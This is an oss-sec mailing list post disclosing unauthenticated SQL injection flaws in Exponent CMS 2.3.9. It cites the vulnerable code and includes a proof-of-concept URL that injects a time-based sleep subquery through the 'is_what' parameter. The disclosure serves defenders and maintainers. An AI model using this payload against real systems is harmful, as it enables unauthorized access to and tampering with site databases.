oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

Exponent CMS 2.3.9 SQL injection vulnerabilities

From: east wu <ylgaaaaa () gmail com>
Date: Mon, 19 Sep 2016 13:46:34 +0800
https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/
addressbook/controllers/addressController.php#L172

'is_what' parameter there is an injection without login


https://github.com/exponentcms/exponent-cms/blob/master/framework/core/subsystems/expDatabase.php#L559

$this->sql("UPDATE " . $this->prefix . $table . " SET " . $col . "=0 WHERE "
. $where);

POC:
/index.php?controller=address&action=activate_address&is_what=address1=(select
* from (select sleep(5))x)%23&id=1
Previous By Date Next
Previous By Thread Next

Current thread: